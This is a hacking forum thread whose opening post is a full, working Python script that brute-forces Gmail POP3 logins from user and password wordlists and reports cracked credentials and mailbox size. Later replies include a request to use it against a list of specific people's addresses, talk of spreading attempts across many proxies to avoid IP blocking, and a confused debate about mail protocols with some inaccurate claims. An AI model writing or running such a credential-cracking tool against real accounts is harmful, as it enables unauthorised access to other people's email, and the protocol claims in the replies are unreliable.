G-mail POP Brute Force

If it doesn't fit anywhere else, it will fit here.
d3hydr8
n00b
Posts: 16
Joined: Tue Sep 26, 2006 2:36 pm
Location: 127.0.0.1
Contact:

G-mail POP Brute Force

Post by d3hydr8 » Thu Jul 12, 2007 9:54 am

Code: Select all

#!usr/bin/python
#Gmail Pop3 Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import threading, time, random, sys, poplib
from copy import copy

def title():
	print "\n\t   d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0"
	print "\t   --------------------------------------------------\n"

if len(sys.argv) !=3:
	title()
	print "\t    Usage: ./gmailpopbrute.py <userlist> <wordlist>\n"
	sys.exit(1)
	
server = "pop.gmail.com"
success = []

try:
  	users = open(sys.argv[1], "r").readlines()
except(IOError): 
	title()
  	print "[-] Error: Check your userlist path\n"
  	sys.exit(1)
  
try:
  	words = open(sys.argv[2], "r").readlines()
except(IOError): 
	title()
  	print "[-] Error: Check your wordlist path\n"
  	sys.exit(1)
	
try:
	pop = poplib.POP3_SSL(server, 995)
	welcome = pop.getwelcome()
	pop.quit()
except (poplib.error_proto): 
	welcome = "No Response"
	pass

title()
print "[+] Server:",server
print "[+] Port: 995"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Server response:",welcome,"\n"

wordlist = copy(words)

def reloader():
	for word in wordlist:
		words.append(word)

def getword():
	lock = threading.Lock()
	lock.acquire()
	if len(words) != 0:
		value = random.sample(words,  1)
		words.remove(value[0])
		
	else:
		print "\n[-] Reloading Wordlist - Changing User\n"
		reloader()
		value = random.sample(words,  1)
		users.remove(users[0])
		
	lock.release()
	if len(users) ==1:
		return value[0][:-1], users[0]
	else:
		return value[0][:-1], users[0][:-1]
		
class Worker(threading.Thread):
	
	def run(self):
		value, user = getword()
		try:
			print "-"*12
			print "[+] User:",user,"Password:",value
			pop = poplib.POP3_SSL(server, 995)
			pop.user(user)
			pop.pass_(value)
			print "\t\t\n\nLogin successful:",user, value
			print "\t\tMail:",pop.stat()[0],"emails"
			print "\t\tSize:",pop.stat()[1],"bytes\n\n"
			success.append(user)
			success.append(value)
			success.append(pop.stat()[0])
			success.append(pop.stat()[1])
			pop.quit()
		except (poplib.error_proto), msg: 
			#print "An error occurred:", msg
			pass
 
for i in range(len(words)*len(users)):
	work = Worker()
	work.start()
	time.sleep(1)
if len(success) >=1:
	print "\n\n[+] Login successful:"
	print "\t[+] User:",success[0]
	print "\t[+] Password:",success[1]
	print "\t[+] Mail:",success[2],"emails"
	print "\t[+] Size:",success[3],"bytes\n"
print "\n[-] Done\n"
Last edited by d3hydr8 on Sun Feb 10, 2008 5:22 pm, edited 1 time in total.

User avatar
korin
Guru
Posts: 592
Joined: Wed Nov 08, 2006 5:51 pm

Post by korin » Thu Jul 12, 2007 11:57 am

umm . . . shouldn't this be in "post your source" in the programming section?

acehart
Strike 1
Posts: 1
Joined: Wed Aug 01, 2007 10:57 pm

Post by acehart » Wed Aug 01, 2007 10:59 pm

with your code i can try to brute force some of these accounts?:

[List of e-mail addresses removed - not to mention, non-Gmail addresses :roll:]

User avatar
GhostHawk
Ex-Mod
Posts: 1447
Joined: Wed Jul 30, 2003 12:10 am
Contact:

Post by GhostHawk » Thu Aug 02, 2007 9:57 am

Looks like someone didn't read the rules. Shame shame. Sometimes I miss my modly powers.
Opinions are like ass holes, everyone has one. It is also my opinion, that I am an ass hole.

TheConfusedEgo
Otaku
Posts: 2629
Joined: Sat Sep 27, 2003 6:25 am

Post by TheConfusedEgo » Thu Aug 02, 2007 10:25 am

I miss your mod powers too.

Luckily for us, I still have mine.

Luckily for him, he's getting a chance to learn from this mistake, which I'd guess you might not have given him ;)

User avatar
hormesis
Veteran
Posts: 679
Joined: Wed May 17, 2006 3:27 pm
Location: irc.tddirc.net #hackerthreads

Post by hormesis » Thu Aug 02, 2007 6:46 pm

I miss my mod powers, too.

Oh wait..

newber
n00b
Posts: 3
Joined: Sun Nov 18, 2007 7:24 am

sup guys

Post by newber » Thu Nov 22, 2007 12:24 am

where can i learn how to read, understand and use this code? is this something newbs shouldnt get in to?

Rick
Hacker in Training
Posts: 86
Joined: Mon Oct 15, 2007 11:55 am
Location: Raleigh,NC

Post by Rick » Thu Nov 22, 2007 12:39 am

find a book on python or you can search the web for python tutorials. a great place to start would be http://www.python.org

qu4ntumCyp|-|3r
n00b
Posts: 2
Joined: Fri Jan 18, 2008 6:22 am
Location: Costa Rica

Blocked access

Post by qu4ntumCyp|-|3r » Fri Jan 18, 2008 12:24 pm

Won't trying a brute force on GMail's pop3 get you blocked? Sure they've covered this attack... The guys at google would not likely have left that loop hole open?

Or am I wrong?

User avatar
stasik
Guru
Posts: 525
Joined: Thu Oct 12, 2006 8:38 am
Location: dublin

Post by stasik » Fri Jan 18, 2008 1:44 pm

by default pop3 is disabled on gmail accounts. if somehow u enable it maybe it would work.but i m sure brutus will do it faster. in yahoo u have to pay for pop service...

User avatar
IceDane
Because I Can
Posts: 2652
Joined: Wed May 12, 2004 9:25 am

Post by IceDane » Fri Jan 18, 2008 8:38 pm

stasik wrote:by default pop3 is disabled on gmail accounts. if somehow u enable it maybe it would work.but i m sure brutus will do it faster. in yahoo u have to pay for pop service...
It isn't disabled - they use port 995 for POP, and also use SSL, so brute-forcing will be a problem with the average brute-forcer, at least.

User avatar
stasik
Guru
Posts: 525
Joined: Thu Oct 12, 2006 8:38 am
Location: dublin

Post by stasik » Sat Jan 19, 2008 6:02 am

on my gmail account it was disabled...

User avatar
IceDane
Because I Can
Posts: 2652
Joined: Wed May 12, 2004 9:25 am

Post by IceDane » Sat Jan 19, 2008 7:17 am

stasik wrote:on my gmail account it was disabled...
No, it wasn't, cause you wouldn't be able to receive mail if it were so.

User avatar
stasik
Guru
Posts: 525
Joined: Thu Oct 12, 2006 8:38 am
Location: dublin

Post by stasik » Sat Jan 19, 2008 1:38 pm

it definitely was off. i turned it on when i was using mail forwarding. how yahoo mail dont have pop but u still receive mails? there are only a few mail providers which provide pop for free. in other it costs, other dont even have the service...but maybe it was off by accident. even if it is on,it is hard to bruteforce it. would be much easier knowing character set

User avatar
Aiden
Administrator
Posts: 1080
Joined: Tue Oct 31, 2006 11:11 pm
Location: /usr/bin/perl

Post by Aiden » Sat Jan 19, 2008 2:06 pm

It's on on all email providers, they just don't allow you to access it directly sometimes, and sometimes you pay to access it.
A POP3 (Post Office Protocol) server is used to store email messages.
"When it takes forever to learn all the rules, no time is left for breaking them."

User avatar
stasik
Guru
Posts: 525
Joined: Thu Oct 12, 2006 8:38 am
Location: dublin

Post by stasik » Sat Jan 19, 2008 3:03 pm

i thought they use smtp protocol. and then u want co connect remotely, pop is used...

User avatar
Aiden
Administrator
Posts: 1080
Joined: Tue Oct 31, 2006 11:11 pm
Location: /usr/bin/perl

Post by Aiden » Sat Jan 19, 2008 3:24 pm

They use SMTP as well. SMTP is the protocol for sending mail, while pop3 is for receiving it.
"When it takes forever to learn all the rules, no time is left for breaking them."

User avatar
IceDane
Because I Can
Posts: 2652
Joined: Wed May 12, 2004 9:25 am

Post by IceDane » Sat Jan 19, 2008 5:44 pm

stasik wrote:i thought they use smtp protocol. and then u want co connect remotely, pop is used...
Like Dru said, they use SMTP for sending mail while POP3 receives it. They could also use another protocol called IMAP for receiving it, but they don't.

qu4ntumCyp|-|3r
n00b
Posts: 2
Joined: Fri Jan 18, 2008 6:22 am
Location: Costa Rica

Hmmmm....

Post by qu4ntumCyp|-|3r » Sun Jan 20, 2008 2:14 am

Appears they do:
IMAP Access:
(access Gmail from other clients using IMAP)
Learn more
1. Status: IMAP is enabled
Enable IMAP
Disable IMAP
I'm just interested to know if a brute force attack would even work... Sure your IP would be blocked shortly after you started it...

Or if you had... 1000 proxy servers (yeah I know highly unlikely).. All trying a user/pass combination in succession...

Hmmm.... :/

blhack
n00b
Posts: 1
Joined: Thu Jul 03, 2008 1:07 pm

Re: G-mail POP Brute Force

Post by blhack » Thu Jul 03, 2008 1:13 pm

I registered just to respond to this....


SMTP is used for both sending and recieving mail. Like FTP is used for both sending and recieving files. This is why when setting up a mail server, it is required to open port 25 to the server. If smtp was used for only sending messages, this would not be the case (firewall states would take care of this).

When email originated, you logged in to the machine in order to read your mail (like the program "mail" on bsd). It was something stored (usually in your home directory[~/.MailDir) that you would read when logging in.

Pop3 and IMAP are both protocols that came around later when "Mailservers" started to come about. Pop3 and IMAP are protocols that allow a mail client running on your local machine to log in to the remote server and download your mail for you.

I know this because I run SMTP (on qmail) on almost all of my machines.

Post Reply